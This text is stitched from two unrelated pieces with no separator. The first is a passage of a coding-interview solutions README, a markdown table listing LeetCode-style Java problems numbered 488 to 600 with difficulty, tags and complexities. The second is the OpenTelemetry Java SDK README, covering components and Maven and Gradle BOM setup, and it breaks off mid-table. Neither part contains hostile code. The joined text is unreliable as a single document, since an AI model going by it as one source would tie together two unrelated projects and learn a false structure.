List.java](https://github.com/awangdev/LintCode/blob/master/Java/876.%20Middle%20of%20Linked%20List.java)|Easy|[Linked List]|||Java|488| |1026|[1026. Maximum Difference Between Node and Ancestor.java](https://github.com/awangdev/LintCode/blob/master/Java/1026.%20Maximum%20Difference%20Between%20Node%20and%20Ancestor.java)|Medium|[DFS, Tree]|O(n)|O(logn)|Java|489| |78|[78. Subsets.java](https://github.com/awangdev/LintCode/blob/master/Java/78.%20Subsets.java)|Medium|[Array, BFS, Backtracking, Bit Manipulation, DFS]|O(2^n)|O(2^n)|Java|490| |432|[432. All One Data Structure.java](https://github.com/awangdev/LintCode/blob/master/Java/432.%20All%20One%20Data%20Structure.java)|Hard|[Design, Doubly Linked List]|O(1)|O(n)|Java|491| |380|[380. Insert Delete GetRandom O(1).java](https://github.com/awangdev/LintCode/blob/master/Java/380.%20Insert%20Delete%20GetRandom%20O(1).java)|Medium|[Array, Design, Hash Table]|O(1) avg|O(n)|Java|492| |560|[560. Subarray Sum Equals K.java](https://github.com/awangdev/LintCode/blob/master/Java/560.%20Subarray%20Sum%20Equals%20K.java)|Medium|[Array, Hash Table, PreSum, Subarray]|O(n)|O(n)|Java|493| |219|[219. Contains Duplicate II.java](https://github.com/awangdev/LintCode/blob/master/Java/219.%20Contains%20Duplicate%20II.java)|Easy|[Array, Hash Table]|O(n)|O(n)|Java|494| |91|[91. Decode Ways.java](https://github.com/awangdev/LintCode/blob/master/Java/91.%20Decode%20Ways.java)|Medium|[DP, Partition DP, String]|O(n)|O(n)|Java|495| |205|[205. Isomorphic Strings.java](https://github.com/awangdev/LintCode/blob/master/Java/205.%20Isomorphic%20Strings.java)|Easy|[Hash Table]|O(n)|O(n)|Java|496| |639|[639. Decode Ways II.java](https://github.com/awangdev/LintCode/blob/master/Java/639.%20Decode%20Ways%20II.java)|Hard|[DP, Enumeration, Partition DP]|O(n)|O(n)|Java|497| |346|[346. Moving Average from Data Stream.java](https://github.com/awangdev/LintCode/blob/master/Java/346.%20Moving%20Average%20from%20Data%20Stream.java)|Easy|[Design, Queue, Sliding Window]|O(1) for `next()`|O(size) for fixed storage|Java|498| |145|[145. Binary Tree Postorder Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/145.%20Binary%20Tree%20Postorder%20Traversal.java)|Medium|[Stack, Tree, Two Stacks]|O(n)|O(n)|Java|499| |938|[938. Range Sum of BST.java](https://github.com/awangdev/LintCode/blob/master/Java/938.%20Range%20Sum%20of%20BST.java)|Easy|[BST, Recursion, Tree]|||Java|500| |210|[210. Course Schedule II.java](https://github.com/awangdev/LintCode/blob/master/Java/210.%20Course%20Schedule%20II.java)|Medium|[BFS, DFS, Graph, Topological Sort]|O(n)|O(n)|Java|501| |68|[68. Text Justification.java](https://github.com/awangdev/LintCode/blob/master/Java/68.%20Text%20Justification.java)|Hard|[Enumeration, String]|O(n) go over words|O(maxLength) buffer list|Java|502| |314|[314. Binary Tree Vertical Order Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/314.%20Binary%20Tree%20Vertical%20Order%20Traversal.java)|Medium|[BFS, DFS, Hash Table, Tree]|O(n)|O(n)|Java|503| |287|[287. Find the Duplicate Number.java](https://github.com/awangdev/LintCode/blob/master/Java/287.%20Find%20the%20Duplicate%20Number.java)|Medium|[Array, Binary Search, Binary Search on Value, Cycle Detection, Slow Fast Pointer, Two Pointers]|O(n)|O(1)|Java|504| |242|[242. Valid Anagram.java](https://github.com/awangdev/LintCode/blob/master/Java/242.%20Valid%20Anagram.java)|Easy|[Hash Table, Sort]|O(n)|O(1), unique chars|Java|505| |340|[340. Longest Substring with At Most K Distinct Characters.java](https://github.com/awangdev/LintCode/blob/master/Java/340.%20Longest%20Substring%20with%20At%20Most%20K%20Distinct%20Characters.java)|Hard|[Hash Table, LinkedHashMap, Sliding Window, String, Two Pointers]|O(n)|O(k)|Java|506| |217|[217. Contains Duplicate.java](https://github.com/awangdev/LintCode/blob/master/Java/217.%20Contains%20Duplicate.java)|Easy|[Array, Hash Table]|O(n)|O(1)|Java|507| |103|[103. Binary Tree Zigzag Level Order Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/103.%20Binary%20Tree%20Zigzag%20Level%20Order%20Traversal.java)|Medium|[BFS, Stack, Tree]|O(n)|O(n)|Java|508| |1057|[1057. Campus Bikes.java](https://github.com/awangdev/LintCode/blob/master/Java/1057.%20Campus%20Bikes.java)|Medium|[Bucket Sort, Greedy, PriorityQueue, Sort]|O(mn)|O(mn)|Java|509| |261|[261. Graph Valid Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/261.%20Graph%20Valid%20Tree.java)|Medium|[BFS, DFS, Graph, Union Find]|||Java|510| |64|[64. Minimum Path Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/64.%20Minimum%20Path%20Sum.java)|Medium|[Array, Coordinate DP, DP]|O(mn)|O(n) rolling array|Java|511| |796|[796. Rotate String.java](https://github.com/awangdev/LintCode/blob/master/Java/796.%20Rotate%20String.java)|Easy|[String]|||Java|512| |229|[229. Majority Element II.java](https://github.com/awangdev/LintCode/blob/master/Java/229.%20Majority%20Element%20II.java)|Medium|[Array, Moore Voting]|O(n)|(1)|Java|513| |1041|[1041. Robot Bounded In Circle.java](https://github.com/awangdev/LintCode/blob/master/Java/1041.%20Robot%20Bounded%20In%20Circle.java)|Easy|[String]|||Java|514| |2|[2. Add Two Numbers.java](https://github.com/awangdev/LintCode/blob/master/Java/2.%20Add%20Two%20Numbers.java)|Medium|[Linked List, Math]|O(max(m,n))|O(max(m,n))|Java|515| |157|[157. Read N Characters Given Read4.java](https://github.com/awangdev/LintCode/blob/master/Java/157.%20Read%20N%20Characters%20Given%20Read4.java)|Easy|[Enumeration, String]|||Java|516| |114|[114. Flatten Binary Tree to Linked List.java](https://github.com/awangdev/LintCode/blob/master/Java/114.%20Flatten%20Binary%20Tree%20to%20Linked%20List.java)|Medium|[Binary Tree, DFS]|O(n)|O(n), stacks|Java|517| |121|[121. Best Time to Buy and Sell Stock.java](https://github.com/awangdev/LintCode/blob/master/Java/121.%20Best%20Time%20to%20Buy%20and%20Sell%20Stock.java)|Easy|[Array, DP, Sequence DP]|||Java|518| |1004|[1004. Max Consecutive Ones III.java](https://github.com/awangdev/LintCode/blob/master/Java/1004.%20Max%20Consecutive%20Ones%20III.java)|Medium|[Sliding Window, Two Pointers]|O(n)|O(1)|Java|519| |1146|[1146. Snapshot Array.java](https://github.com/awangdev/LintCode/blob/master/Java/1146.%20Snapshot%20Array.java)|Medium|[Array, Hash Table, TreeMap]|O(1) set, O(logn) get, O(x) snap, x = # of changes|O(n * m), n = array size, m = # of snaps|Java|520| |273|[273. Integer to English Words.java](https://github.com/awangdev/LintCode/blob/master/Java/273.%20Integer%20to%20English%20Words.java)|Hard|[Enumeration, Math, String]|O(n)|O(1)|Java|521| |304|[304. Range Sum Query 2D - Immutable.java](https://github.com/awangdev/LintCode/blob/master/Java/304.%20Range%20Sum%20Query%202D%20-%20Immutable.java)|Medium|[DP, PreSum]|O(mn) build, O(1) query|O(mn)|Java|522| |605|[605. Can Place Flowers.java](https://github.com/awangdev/LintCode/blob/master/Java/605.%20Can%20Place%20Flowers.java)|Easy|[Array, Greedy]|O(n)|O(1)|Java|523| |1|[1. Two Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/1.%20Two%20Sum.java)|Easy|[Array, Hash Table]|O(n)|O(n)|Java|524| |118|[118. Pascal's Triangle.java](https://github.com/awangdev/LintCode/blob/master/Java/118.%20Pascal's%20Triangle.java)|Easy|[Array, Basic Implementation, List]|O(n^2) based on pascal triangle size|O(n^2)|Java|525| |23|[23. Merge k Sorted Lists.java](https://github.com/awangdev/LintCode/blob/master/Java/23.%20Merge%20k%20Sorted%20Lists.java)|Medium|[Divide and Conquer, Heap, Linked List, Merge Sort, PriorityQueue]|O(nlogk)|O(logk)|Java|526| |283|[283. Move Zeroes.java](https://github.com/awangdev/LintCode/blob/master/Java/283.%20Move%20Zeroes.java)|Easy|[Array, Two Pointers]|O(n)|O(1)|Java|527| |208|[208. Implement Trie (Prefix Tree).java](https://github.com/awangdev/LintCode/blob/master/Java/208.%20Implement%20Trie%20(Prefix%20Tree).java)|Medium|[Design, Trie]|||Java|528| |516|[516. Longest Palindromic Subsequence.java](https://github.com/awangdev/LintCode/blob/master/Java/516.%20Longest%20Palindromic%20Subsequence.java)|Medium|[DFS, DP, Interval DP, Memoization]|O(n^2)|O(n^2)|Java|529| |218|[218. The Skyline Problem.java](https://github.com/awangdev/LintCode/blob/master/Java/218.%20The%20Skyline%20Problem.java)|Hard|[BIT, Divide and Conquer, HashHeap, Heap, PriorityQueue, Segment Tree, Sweep Line]|O(n^2logn)|O(n)|Java|530| |430|[430. Flatten a Multilevel Doubly Linked List.java](https://github.com/awangdev/LintCode/blob/master/Java/430.%20Flatten%20a%20Multilevel%20Doubly%20Linked%20List.java)|Medium|[DFS, Linked List]|O(n)|O(1)|Java|531| |63|[63. Unique Paths II.java](https://github.com/awangdev/LintCode/blob/master/Java/63.%20Unique%20Paths%20II.java)|Medium|[Array, Coordinate DP, DP]|O(mn)|O(mn)|Java|532| |52|[52. N-Queens II.java](https://github.com/awangdev/LintCode/blob/master/Java/52.%20N-Queens%20II.java)|Hard|[Backtracking]|O(n!)|O(n)|Java|533| |1033|[1033. Moving Stones Until Consecutive.java](https://github.com/awangdev/LintCode/blob/master/Java/1033.%20Moving%20Stones%20Until%20Consecutive.java)|Easy|[Basic Implementation, Sort]|O(1), only 3 elements|O(1)|Java|534| |139|[139. Word Break.java](https://github.com/awangdev/LintCode/blob/master/Java/139.%20Word%20Break.java)|Medium|[DP, Hash Table, Sequence DP]|O(n^2)|O(n)|Java|535| |105|[105. Construct Binary Tree from Preorder and Inorder Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/105.%20Construct%20Binary%20Tree%20from%20Preorder%20and%20Inorder%20Traversal.java)|Medium|[Array, DFS, Divide and Conquer, Hash Table, Tree]|O(n)|O(n)|Java|536| |125|[125. Valid Palindrome.java](https://github.com/awangdev/LintCode/blob/master/Java/125.%20Valid%20Palindrome.java)|Easy|[String, Two Pointers]|||Java|537| |449|[449. Serialize and Deserialize BST.java](https://github.com/awangdev/LintCode/blob/master/Java/449.%20Serialize%20and%20Deserialize%20BST.java)|Medium|[Tree]|O(n)|O(n)|Java|538| |274|[274.H-Index.java](https://github.com/awangdev/LintCode/blob/master/Java/274.H-Index.java)|Medium|[Bucket Sort, Hash Table, Sort]|O(n)|O(n)|Java|539| |160|[160. Intersection of Two Linked Lists.java](https://github.com/awangdev/LintCode/blob/master/Java/160.%20Intersection%20of%20Two%20Linked%20Lists.java)|Easy|[Linked List]|||Java|540| |40|[40. Combination Sum II.java](https://github.com/awangdev/LintCode/blob/master/Java/40.%20Combination%20Sum%20II.java)|Medium|[Array, Backtracking, Combination, DFS]|O(k * 2^n), k = avg rst length|O(n) stack depth, if not counting result size|Java|541| |410|[410. Split Array Largest Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/410.%20Split%20Array%20Largest%20Sum.java)|N/A|[]|||Java|542| |724|[724. Find Pivot Index.java](https://github.com/awangdev/LintCode/blob/master/Java/724.%20Find%20Pivot%20Index.java)|Easy|[Array, PreSum]|O(n)|O(1)|Java|543| |523|[523. Continuous Subarray Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/523.%20Continuous%20Subarray%20Sum.java)|Medium|[Coordinate DP, DP, Math, PreSum, Subarray]|O(n)|O(k)|Java|544| |65|[65. Valid Number.java](https://github.com/awangdev/LintCode/blob/master/Java/65.%20Valid%20Number.java)|Hard|[Enumeration, Math, String]|O(n)|O(1)|Java|545| |350|[350. Intersection of Two Arrays II.java](https://github.com/awangdev/LintCode/blob/master/Java/350.%20Intersection%20of%20Two%20Arrays%20II.java)|Easy|[Binary Search, Hash Table, Sort, Two Pointers]|(n)|(n)|Java|546| |364|[364. Nested List Weight Sum II.java](https://github.com/awangdev/LintCode/blob/master/Java/364.%20Nested%20List%20Weight%20Sum%20II.java)|Medium|[DFS, NestedInteger]|O(n), visit all nodes|O(h), depth|Java|547| |49|[49. Group Anagrams.java](https://github.com/awangdev/LintCode/blob/master/Java/49.%20Group%20Anagrams.java)|Medium|[Hash Table, String]|O(nk)|O(nk)|Java|548| |720|[720. Longest Word in Dictionary.java](https://github.com/awangdev/LintCode/blob/master/Java/720.%20Longest%20Word%20in%20Dictionary.java)|Easy|[Hash Table, Trie]|O(nlogn)|O(n)|Java|549| |438|[438. Find All Anagrams in a String.java](https://github.com/awangdev/LintCode/blob/master/Java/438.%20Find%20All%20Anagrams%20in%20a%20String.java)|Medium|[Hash Table, Sliding Window, Two Pointers]|O(n)|O(1)|Java|550| |632|[632. Smallest Range Covering Elements from K Lists.java](https://github.com/awangdev/LintCode/blob/master/Java/632.%20Smallest%20Range%20Covering%20Elements%20from%20K%20Lists.java)|Hard|[Hash Table, Sliding Window, Two Pointers]|O(nlogn), n = total elements|O(n) to store sorted list|Java|551| |138|[138. Copy List with Random Pointer.java](https://github.com/awangdev/LintCode/blob/master/Java/138.%20Copy%20List%20with%20Random%20Pointer.java)|Medium|[Hash Table, Linked List]|O(n)|O(n)|Java|552| |159|[159. Longest Substring with At Most Two Distinct Characters.java](https://github.com/awangdev/LintCode/blob/master/Java/159.%20Longest%20Substring%20with%20At%20Most%20Two%20Distinct%20Characters.java)|Medium|[Hash Table, Sliding Window, String, Two Pointers]|O(n)|O(1)|Java|553| |1043|[1043. Partition Array for Maximum Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/1043.%20Partition%20Array%20for%20Maximum%20Sum.java)|Medium|[DFS, DP, Graph, Memoization]|O(n), calc memo[n]|O(n)|Java|554| |33|[33. Search in Rotated Sorted Array.java](https://github.com/awangdev/LintCode/blob/master/Java/33.%20Search%20in%20Rotated%20Sorted%20Array.java)|Medium|[Array, Binary Search]|O(logn)|O(1)|Java|555| |760|[760. Find Anagram Mappings.java](https://github.com/awangdev/LintCode/blob/master/Java/760.%20Find%20Anagram%20Mappings.java)|Easy|[Hash Table]|O(n)|O(n)|Java|556| |133|[133. Clone Graph.java](https://github.com/awangdev/LintCode/blob/master/Java/133.%20Clone%20Graph.java)|Medium|[BFS, DFS, Graph]|O(n)|O(n)|Java|557| |743|[743. Network Delay Time.java](https://github.com/awangdev/LintCode/blob/master/Java/743.%20Network%20Delay%20Time.java)|Medium|[BFS, DFS, Graph, Heap, PQ]|O(nlogn)|O(n)|Java|558| |636|[636. Exclusive Time of Functions.java](https://github.com/awangdev/LintCode/blob/master/Java/636.%20Exclusive%20Time%20of%20Functions.java)|Medium|[Stack]|O(n)|O(n)|Java|559| |692|[692. Top K Frequent Words.java](https://github.com/awangdev/LintCode/blob/master/Java/692.%20Top%20K%20Frequent%20Words.java)|Medium|[Hash Table, Heap, MaxHeap, MinHeap, PriorityQueue, Trie]|O(n)|O(n)|Java|560| |1170|[1170. Compare Strings by Frequency of the Smallest Character.java](https://github.com/awangdev/LintCode/blob/master/Java/1170.%20Compare%20Strings%20by%20Frequency%20of%20the%20Smallest%20Character.java)|Easy|[Array, String]|O(m + n)|O(m + n)|Java|561| |426|[426. Convert Binary Search Tree to Sorted Doubly Linked List.java](https://github.com/awangdev/LintCode/blob/master/Java/426.%20Convert%20Binary%20Search%20Tree%20to%20Sorted%20Doubly%20Linked%20List.java)|Medium|[BST, DFS, Divide and Conquer, Linked List, Tree]|O(n)|O(1)|Java|562| |745|[745. Prefix and Suffix Search.java](https://github.com/awangdev/LintCode/blob/master/Java/745.%20Prefix%20and%20Suffix%20Search.java)|Hard|[Trie]|O(N + Q)|O(N)|Java|563| |8|[8. String to Integer (atoi).java](https://github.com/awangdev/LintCode/blob/master/Java/8.%20String%20to%20Integer%20(atoi).java)|Medium|[Math, String]|O(n)|O(n)|Java|564| |361|[361. Bomb Enemy.java](https://github.com/awangdev/LintCode/blob/master/Java/361.%20Bomb%20Enemy.java)|Medium|[Coordinate DP, DP]|O(mn)|O(n) by calculating column sum|Java|565| |94|[94. Binary Tree Inorder Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/94.%20Binary%20Tree%20Inorder%20Traversal.java)|Easy|[Hash Table, Stack, Tree]|O(n)|O(logn)|Java|566| |402|[402. Remove K Digits.java](https://github.com/awangdev/LintCode/blob/master/Java/402.%20Remove%20K%20Digits.java)|Medium|[Greedy, Monotonous Stack, Stack]|O(n)|O(n)|Java|567| |98|[98. Validate Binary Search Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/98.%20Validate%20Binary%20Search%20Tree.java)|Medium|[BST, DFS, Divide and Conquer, Tree]|O(n)|O(logn)|Java|568| |1123|[1123. Lowest Common Ancestor of Deepest Leaves.java](https://github.com/awangdev/LintCode/blob/master/Java/1123.%20Lowest%20Common%20Ancestor%20of%20Deepest%20Leaves.java)|Medium|[BFS, DFS, Tree]|O(n)|O(n)|Java|569| |921|[921. Minimum Add to Make Parentheses Valid.java](https://github.com/awangdev/LintCode/blob/master/Java/921.%20Minimum%20Add%20to%20Make%20Parentheses%20Valid.java)|Medium|[]|O(n)|O(1)|Java|570| |399|[399. Evaluate Division.java](https://github.com/awangdev/LintCode/blob/master/Java/399.%20Evaluate%20Division.java)|Medium|[BFS, DFS, Graph, Union Find]|||Java|571| |785|[785. Is Graph Bipartite.java](https://github.com/awangdev/LintCode/blob/master/Java/785.%20Is%20Graph%20Bipartite.java)|Medium|[BFS, DFS, Garph]|O(n)|O(n)|Java|572| |767|[767. Reorganize String.java](https://github.com/awangdev/LintCode/blob/master/Java/767.%20Reorganize%20String.java)|Medium|[Greedy, Hash Table, Heap, Sort, String]|O(m), m = # of unique letters|O(nLogm), n = length|Java|573| |71|[71. Simplify Path.java](https://github.com/awangdev/LintCode/blob/master/Java/71.%20Simplify%20Path.java)|Medium|[Stack, String]|O(n)|O(n)|Java|574| |34|[34. Find First and Last Position of Element in Sorted Array.java](https://github.com/awangdev/LintCode/blob/master/Java/34.%20Find%20First%20and%20Last%20Position%20of%20Element%20in%20Sorted%20Array.java)|Medium|[Array, Binary Search]|O(logn)|O(1)|Java|575| |278|[278. First Bad Version.java](https://github.com/awangdev/LintCode/blob/master/Java/278.%20First%20Bad%20Version.java)|Easy|[Binary Search]|O(logN)|O(1)|Java|576| |124|[124. Binary Tree Maximum Path Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/124.%20Binary%20Tree%20Maximum%20Path%20Sum.java)|Hard|[DFS, DP, Tree, Tree DP]|O(n)|O(logn)|Java|577| |721|[721. Accounts Merge.java](https://github.com/awangdev/LintCode/blob/master/Java/721.%20Accounts%20Merge.java)|Medium|[DFS, Hash Table, Union Find]|||Java|578| |689|[689. Maximum Sum of 3 Non-Overlapping Subarrays.java](https://github.com/awangdev/LintCode/blob/master/Java/689.%20Maximum%20Sum%20of%203%20Non-Overlapping%20Subarrays.java)|Hard|[Array, DP]|O(n)|O(n)|Java|579| |101|[101. Symmetric Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/101.%20Symmetric%20Tree.java)|Easy|[BFS, DFS, Tree]|O(n)|O(n)|Java|580| |149|[149. Max Points on a Line.java](https://github.com/awangdev/LintCode/blob/master/Java/149.%20Max%20Points%20on%20a%20Line.java)|Hard|[Array, Geometry, Hash Table, Math]|O(n^2)|O()|Java|581| |698|[698. Partition to K Equal Sum Subsets.java](https://github.com/awangdev/LintCode/blob/master/Java/698.%20Partition%20to%20K%20Equal%20Sum%20Subsets.java)|Medium|[DFS, DP, Recursion]|O(k^(n-k) * k!)|O(n)|Java|582| |57|[57. Insert Interval.java](https://github.com/awangdev/LintCode/blob/master/Java/57.%20Insert%20Interval.java)|Hard|[Array, PriorityQueue, Sort, Sweep Line]|O(n)|O(n)|Java|583| |13|[13. Roman to Integer.java](https://github.com/awangdev/LintCode/blob/master/Java/13.%20Roman%20to%20Integer.java)|Easy|[Math, String]|O(n)|O(1)|Java|584| |716|[716. Max Stack.java](https://github.com/awangdev/LintCode/blob/master/Java/716.%20Max%20Stack.java)|Medium|[Design, Doubly Linked List, Stack, TreeMap]|avg O(1), [O(logN) peekMax(), TreeMap]; [O(n) popMax(), TwoStack]|O(n)|Java|585| |671|[671. Second Minimum Node In a Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/671.%20Second%20Minimum%20Node%20In%20a%20Binary%20Tree.java)|Easy|[BFS, Tree]|O(n)|O(n) leaf nodes|Java|586| |366|[366. Find Leaves of Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/366.%20Find%20Leaves%20of%20Binary%20Tree.java)|Medium|[DFS, Tree]|O(n)|O(h)|Java|587| |235|[235. Lowest Common Ancestor of a Binary Search Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/235.%20Lowest%20Common%20Ancestor%20of%20a%20Binary%20Search%20Tree.java)|Easy|[BST, DFS, Tree]|O(logn)|O(logn)|Java|588| |156|[156. Binary Tree Upside Down.java](https://github.com/awangdev/LintCode/blob/master/Java/156.%20Binary%20Tree%20Upside%20Down.java)|Medium|[DFS, Tree]|O(n)|O(h)|Java|589| |416|[416. Partition Equal Subset Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/416.%20Partition%20Equal%20Subset%20Sum.java)|Medium|[Backpack, DP]|||Java|590| |611|[611. Valid Triangle Number.java](https://github.com/awangdev/LintCode/blob/master/Java/611.%20Valid%20Triangle%20Number.java)|Medium|[Array, Two Pointers]|O(n^2)|O(logn), sorting space|Java|591| |341|[341. Flatten Nested List Iterator.java](https://github.com/awangdev/LintCode/blob/master/Java/341.%20Flatten%20Nested%20List%20Iterator.java)|Medium|[Design, NestedInteger, Stack]|O(n)|O(n)|Java|592| |254|[254. Factor Combinations.java](https://github.com/awangdev/LintCode/blob/master/Java/254.%20Factor%20Combinations.java)|Medium|[BFS, Backtracking, DFS]|O(x), x is the # of results|O(y), y is all ongoing candidates in queue|Java|593| |739|[739. Daily Temperatures.java](https://github.com/awangdev/LintCode/blob/master/Java/739.%20Daily%20Temperatures.java)|Medium|[Hash Table, Monotonous Stack, Stack]|O(n)|O(n)|Java|594| |373|[373. Find K Pairs with Smallest Sums.java](https://github.com/awangdev/LintCode/blob/master/Java/373.%20Find%20K%20Pairs%20with%20Smallest%20Sums.java)|Medium|[Heap, MaxHeap, MinHeap]|O(klogk)|O(k)|Java|595| |256|[256. Paint House.java](https://github.com/awangdev/LintCode/blob/master/Java/256.%20Paint%20House.java)|Easy|[DP, Sequence DP, Status DP]|O(nm), m = # of colors|O(nm), or O(1) with rolling array|Java|596| |265|[265. Paint House II.java](https://github.com/awangdev/LintCode/blob/master/Java/265.%20Paint%20House%20II.java)|Hard|[DP, Sequence DP, Status DP]|O(NK^2):|O(K) with rolling array|Java|597| |272|[272. Closest Binary Search Tree Value II.java](https://github.com/awangdev/LintCode/blob/master/Java/272.%20Closest%20Binary%20Search%20Tree%20Value%20II.java)|Hard|[Stack, Tree]|O(n)|O(n)|Java|598| |72|[72. Edit Distance.java](https://github.com/awangdev/LintCode/blob/master/Java/72.%20Edit%20Distance.java)|Hard|[DP, Double Sequence DP, Sequence DP, String]|O(MN)||Java|599| |215|[215. Kth Largest Element in an Array.java](https://github.com/awangdev/LintCode/blob/master/Java/215.%20Kth%20Largest%20Element%20in%20an%20Array.java)|Medium|[Divide and Conquer, Heap, MinHeap, PriorityQueue, Quick Select, Quick Sort]|O(nlogk)|O(k)|Java|600|
OpenTelemetry Java SDK
# OpenTelemetry Java [![Continuous Build][ci-image]][ci-url] [![Coverage Status][codecov-image]][codecov-url] [![Maven Central][maven-image]][maven-url] ## Project Status See [Java status on OpenTelemetry.io][otel-java-status]. ## Getting Started If you are looking for an all-in-one, easy-to-install **auto-instrumentation javaagent**, see [opentelemetry-java-instrumentation][]. If you are looking for **examples** on how to use the OpenTelemetry API to write your own **manual instrumentation**, or how to set up the OpenTelemetry Java SDK, see [Manual instrumentation][]. Fully-functional examples are available in [opentelemetry-java-docs][]. If you are looking for generated classes for the [OpenTelemetry semantic conventions][opentelemetry-semantic-conventions], see [semantic-conventions-java][opentelemetry-semantic-conventions-java]. For a general overview of OpenTelemetry, visit [opentelemetry.io][]. Would you like to get involved with the project? Read our [contributing guide](CONTRIBUTING.md). We welcome contributions! ## Contacting us We hold regular meetings. See details at [community page](https://github.com/open-telemetry/community#java-sdk). We use [GitHub Discussions](https://github.com/open-telemetry/opentelemetry-java/discussions) for support or general questions. Feel free to drop us a line. We are also present in the [`#otel-java`](https://cloud-native.slack.com/archives/C014L2KCTE3) channel in the [CNCF slack](https://slack.cncf.io/). Please join us for more informal discussions. To report a bug, or request a new feature, please [open an issue](https://github.com/open-telemetry/opentelemetry-java/issues/new/choose). ## Overview OpenTelemetry is the merging of OpenCensus and OpenTracing into a single project. This project contains the following top level components: * [OpenTelemetry API](api/): * [stable apis](api/all) including `Tracer`, `Span`, `SpanContext`, `Meter`, and `Baggage`. * [context api](context/) The OpenTelemetry Context implementation. * [incubating apis](api/incubator) incubating APIs, including `Events`. * [extensions](extensions/) define additional API extensions not part of the core API, including propagators. * [sdk](sdk/) defines the implementation of the OpenTelemetry API. * [exporters](exporters/) trace, metric, and log exporters for the SDK. * [sdk-extensions](sdk-extensions/) defines additional SDK extensions, which are not part of the core SDK. * [OpenTracing shim](opentracing-shim/) defines a bridge layer from OpenTracing to the OpenTelemetry API. * [OpenCensus shim](opencensus-shim/) defines a bridge layer from OpenCensus to the OpenTelemetry API. This project publishes a lot of artifacts, listed in [releases](#releases). [`opentelemetry-bom`](https://mvnrepository.com/artifact/io.opentelemetry/opentelemetry-bom) (BOM = Bill of Materials) is provided to assist with synchronizing versions of dependencies. [`opentelemetry-bom-alpha`](https://mvnrepository.com/artifact/io.opentelemetry/opentelemetry-bom-alpha) provides the same function for unstable artifacts. See [published releases](#published-releases) for instructions on using the BOMs. We would love to hear from the larger community: please provide feedback proactively. ## Requirements Unless otherwise noted, all published artifacts support Java 8 or higher. See [language version compatibility](VERSIONING.md#language-version-compatibility) for complete details. **Android Disclaimer:** For compatibility reasons, [library desugaring](https://developer.android.com/studio/write/java8-support#library-desugaring) must be enabled. See [CONTRIBUTING.md](./CONTRIBUTING.md) for additional instructions for building this project for development. ### Note about extensions Both API and SDK extensions consist of various additional components which are excluded from the core artifacts to keep them from growing too large. We still aim to provide the same level of quality and guarantee for them as for the core components. Please don't hesitate to use them if you find them useful. ## Project setup and contributing Please refer to the [contribution guide](CONTRIBUTING.md) on how to set up for development and contribute! ## Published Releases Published releases are available on maven central. We strongly recommend using our published BOM to keep all dependency versions in sync. ### Maven ```xml <project> <dependencyManagement> <dependencies> <dependency> <groupId>io.opentelemetry</groupId> <artifactId>opentelemetry-bom</artifactId> <version>1.37.0</version> <type>pom</type> <scope>import</scope> </dependency> </dependencies> </dependencyManagement> <dependencies> <dependency> <groupId>io.opentelemetry</groupId> <artifactId>opentelemetry-api</artifactId> </dependency> </dependencies> </project> ``` ### Gradle ```groovy dependencies { implementation platform("io.opentelemetry:opentelemetry-bom:1.37.0") implementation('io.opentelemetry:opentelemetry-api') } ``` Note that if you want to use any artifacts that have not fully stabilized yet (such as the [prometheus exporter](https://github.com/open-telemetry/opentelemetry-java/tree/main/exporters/prometheus), then you will need to add an entry for the Alpha BOM as well, e.g. ```groovy dependencies { implementation platform("io.opentelemetry:opentelemetry-bom:1.37.0") implementation platform('io.opentelemetry:opentelemetry-bom-alpha:1.37.0-alpha') implementation('io.opentelemetry:opentelemetry-api') implementation('io.opentelemetry:opentelemetry-exporter-prometheus') implementation('io.opentelemetry:opentelemetry-sdk-extension-autoconfigure') } ``` ## Snapshots Snapshots based out the `main` branch are available for `opentelemetry-api`, `opentelemetry-sdk` and the rest of the artifacts. We strongly recommend using our published BOM to keep all dependency versions in sync. ### Maven ```xml <project> <repositories> <repository> <id>oss.sonatype.org-snapshot</id> <url>https://oss.sonatype.org/content/repositories/snapshots</url> </repository> </repositories> <dependencyManagement> <dependencies> <dependency> <groupId>io.opentelemetry</groupId> <artifactId>opentelemetry-bom</artifactId> <version>1.38.0-SNAPSHOT</version> <type>pom</type> <scope>import</scope> </dependency> </dependencies> </dependencyManagement> <dependencies> <dependency> <groupId>io.opentelemetry</groupId> <artifactId>opentelemetry-api</artifactId> </dependency> </dependencies> </project> ``` ### Gradle ```groovy repositories { maven { url 'https://oss.sonatype.org/content/repositories/snapshots' } } dependencies { implementation platform("io.opentelemetry:opentelemetry-bom:1.38.0-SNAPSHOT") implementation('io.opentelemetry:opentelemetry-api') } ``` Libraries will usually only need `opentelemetry-api`, while applications will want to use the `opentelemetry-sdk` module which contains our standard implementation of the APIs. ## Gradle composite builds For opentelemetry-java developers that need to test the latest source code with another project, composite builds can be used as an alternative to `publishToMavenLocal`. This requires some setup which is explained [here](CONTRIBUTING.md#composing-builds). ## Releases See the [VERSIONING.md](VERSIONING.md) document for our policies for releases and compatibility guarantees. Check out information about the [latest release](https://github.com/open-telemetry/opentelemetry-java/releases). See the project [milestones](https://github.com/open-telemetry/opentelemetry-java/milestones) for details on upcoming releases. The dates and features described in issues and milestones are estimates, and subject to change. The following tables describe the artifacts published by this project. To take a dependency, follow the instructions in [Published Released](#published-releases) to include the BOM, and specify the dependency as follows, replacing `{{artifact-id}}` with the value from the "Artifact ID" column: ```xml <dependency> <groupId>io.opentelemetry</groupId> <artifactId>{{artifact-id}}</artifactId> </dependency> ``` ```groovy implementation('io.opentelemetry:{{artifact-id}}') ``` ### Bill of Material | Component | Description | Artifact ID | Version | Javadoc | |----------------------------------------------|----------------------------------------|---------------------------|-------------------------------------------------------------|---------| | [Bill of Materials (BOM)](./bom) | Bill of materials for stable artifacts | `opentelemetry-bom` | 